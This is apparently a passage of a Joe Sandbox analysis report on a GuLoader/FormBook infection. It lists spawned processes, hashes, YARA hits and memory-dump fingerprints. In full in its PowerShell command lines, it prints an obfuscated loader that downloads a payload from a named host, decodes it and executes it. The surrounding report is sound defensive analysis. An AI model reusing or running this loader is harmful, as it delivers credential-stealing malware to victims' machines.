');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                              Imagebase:0xaf0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000014.00000002.3371615882.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:21
                              Start time:02:09:41
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:22
                              Start time:02:09:42
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:02:09:49
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                              Imagebase:0xaf0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000018.00000002.2970578601.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000018.00000002.2944964095.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.2970941150.000000000A1F7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:25
                              Start time:02:09:50
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:02:10:06
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x7ff6ae840000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:02:10:07
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000002.3098293676.0000000003B17000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:28
                              Start time:02:10:28
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe"
                              Imagebase:0xc60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Has exited:false

                              Target ID:29
                              Start time:02:10:30
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\clip.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                              Imagebase:0xce0000
                              File size:24'576 bytes
                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Has exited:false

                              Target ID:30
                              Start time:02:10:43
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe"
                              Imagebase:0xc60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Has exited:false

                              Target ID:31
                              Start time:02:10:46
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:02:10:47
                              Start date:31/05/2024
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Imagebase:0x7ff6c2750000
                              File size:71'680 bytes
                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:02:10:55
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:02:10:56
                              Start date:31/05/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff728280000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Reset < >
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34690000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a3f3d7a662fa18e03e3cbe730640741efdb1a50e58f724e2db4bbf4ae476d71
                                • Instruction ID: 082c87fd3c25967a8564f2cad38147fdcd3279f35d70bfd89a5c2efeadfa9c11
                                • Opcode Fuzzy Hash: 9a3f3d7a662fa18e03e3cbe730640741efdb1a50e58f724e2db4bbf4ae476d71
                                • Instruction Fuzzy Hash: D0F19530A18A8D8FEBA8DF28CC957E937E1FF55310F04426EE84DC7291DB7899459B81
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34690000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 961fd74c1f79261587570d4c5d8e35189cd0bae16df9107c4f4787e9941bbacb
                                • Instruction ID: 55fbfca6d487a7b3c1111bc122330748d80d4b5a83ce56a50f8d40a73b7eda3c
                                • Opcode Fuzzy Hash: 961fd74c1f79261587570d4c5d8e35189cd0bae16df9107c4f4787e9941bbacb
                                • Instruction Fuzzy Hash: 68E1B430A08A4E8FEBA8DF28D8A57E977D1FF55710F04426ED84DC7291DF78A8458B81
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86e898218372bc26ff38c15e5c9b44f3e65b860d9dfeb9befd1f68e22e4d6e1a
                                • Instruction ID: ada702b472753155d36901dc99ab6dbe465545c4671e048a289db15b3095d4a3
                                • Opcode Fuzzy Hash: 86e898218372bc26ff38c15e5c9b44f3e65b860d9dfeb9befd1f68e22e4d6e1a
                                • Instruction Fuzzy Hash: 3CE14A72B0DA8A8FE795DB2848B51B87BE2EF56324B1801BED54DC71D3CA1CB805D381
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d4e8bf93f67aa710fdc78ba49203cadfcd1b03fddabfc9e7b74125337a494eaf
                                • Instruction ID: 378cd7e1feae652f9acf66857b443cfb87d34085b7b9bc40ab2422c77c5384c9
                                • Opcode Fuzzy Hash: d4e8bf93f67aa710fdc78ba49203cadfcd1b03fddabfc9e7b74125337a494eaf
                                • Instruction Fuzzy Hash: B1B11572A0DA8C5FE7A5EA6C98A55A53BE2EF57320B1401BBD14DC7193DA18FC06C381
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f58f1a1331a0c3f3adcd97d439a968b740c5f998035ca6931680652266ccc8cc
                                • Instruction ID: 55d9371f15f2eaac2acb3fd919cb8bb1f5ebfd43e9f50c30f6a5c6af11d5e5c4
                                • Opcode Fuzzy Hash: f58f1a1331a0c3f3adcd97d439a968b740c5f998035ca6931680652266ccc8cc
                                • Instruction Fuzzy Hash: 23A17972B0DA894FEBE4DA2C64A81B87BD3EF56360B4401BED50DC7293DD1CAC019380
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34690000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee6527bd196ddfad7ebce2729ed989711fb33a852ebebe1a74e10a3b48e6aa7e
                                • Instruction ID: 493344fff5483a1025a4dfa5acf01406b2b771cdbbcfebf559b9be0add9e4eaf
                                • Opcode Fuzzy Hash: ee6527bd196ddfad7ebce2729ed989711fb33a852ebebe1a74e10a3b48e6aa7e
                                • Instruction Fuzzy Hash: C081003160C6854FE759EF18C4E16E5BBE1FF96314B1401BED0CAC71A3DA69A846CB41
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0f94fd425fc757af4b6671c9b3ff1b262eefe55357348fea43e0584a772cd3af
                                • Instruction ID: 13c80ac357e4d7632d586a7cdd8c30233c23591edb71b58f11b56c468dae5428
                                • Opcode Fuzzy Hash: 0f94fd425fc757af4b6671c9b3ff1b262eefe55357348fea43e0584a772cd3af
                                • Instruction Fuzzy Hash: 144134A2B0EA8A4FE795DB2C48B51B87BD2EF52264B5801BAD10DD72D3DD1CFC049381
                                Memory Dump Source
